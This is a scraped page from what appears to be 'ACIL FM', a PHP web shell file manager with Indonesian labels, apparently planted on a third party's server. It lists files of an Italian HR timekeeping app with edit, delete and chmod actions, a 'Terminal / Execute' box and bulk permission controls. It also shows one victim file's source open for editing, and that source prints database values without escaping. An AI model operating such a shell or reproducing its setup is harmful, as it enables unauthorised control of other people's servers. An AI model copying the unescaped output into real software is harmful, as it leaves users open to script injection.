ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/timbrature/NH-HR-test/ds/public/settings
/
home
mhhtmff
timbrature
NH-HR-test
ds
public
settings
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
check_parameters_content.php
2.89 MB
chmod
View
DL
Edit
Rename
Delete
company_datas_content.php
980 B
chmod
View
DL
Edit
Rename
Delete
cron_jobs_list.php
1.95 MB
chmod
View
DL
Edit
Rename
Delete
cron_logs_list.php
841 B
chmod
View
DL
Edit
Rename
Delete
edit_cron_job_content.php
11.08 MB
chmod
View
DL
Edit
Rename
Delete
edit_justification_content.php
3.19 MB
chmod
View
DL
Edit
Rename
Delete
edit_payments_office_content.php
2.76 MB
chmod
View
DL
Edit
Rename
Delete
edit_stamper_content.php
2.84 MB
chmod
View
DL
Edit
Rename
Delete
justifications_content.php
1.25 MB
chmod
View
DL
Edit
Rename
Delete
new_cron_job_content.php
4.63 MB
chmod
View
DL
Edit
Rename
Delete
new_justification_content.php
2.16 MB
chmod
View
DL
Edit
Rename
Delete
new_payments_office_content.php
2.08 MB
chmod
View
DL
Edit
Rename
Delete
new_stamper_content.php
2.21 MB
chmod
View
DL
Edit
Rename
Delete
payments_office_content.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
settings_list.php
7.42 MB
chmod
View
DL
Edit
Rename
Delete
stampers_list.php
1.32 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/timbrature/NH-HR-test/ds/public/settings/stampers_list.php
<?php session_start(); if (!isset($_SESSION['loggedin'])) { exit("unauthorized"); } include "../../php/database.php"; ?> <table id="stempers_list_table" class="display" style="width: 100%;"> <thead> <tr> <th>Nome</th> <th>Indirizzo IP</th> <th>Descrizione</th> <th>Ubicazione</th> <th>Nome file import</th> <th></th> </tr> </thead> <tbody> <?php $sql = "SELECT * FROM stampers ORDER BY name ASC"; $result = mysqli_query($con, $sql); while ($row = mysqli_fetch_assoc($result)) { echo "<tr>"; echo "<td>" . $row["name"] . "</td>"; echo "<td>" . $row["ip_address"] . "</td>"; echo "<td>" . $row["description"] . "</td>"; echo "<td>" . $row["location"] . "</td>"; echo "<td>" . $row["file_name"] . "</td>"; echo "<td> <a onclick='editStamper(" . $row["id"] . ")' style='cursor: pointer; margin-right:10px'><i class='fa-solid fa-magnifying-glass'></i></a> <a onclick='deleteStamper(" . $row["id"] . ")' style='cursor: pointer'><i class='fa-solid fa-trash'></i></a> </td>"; echo "</tr>"; } ?> </tbody> </table>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply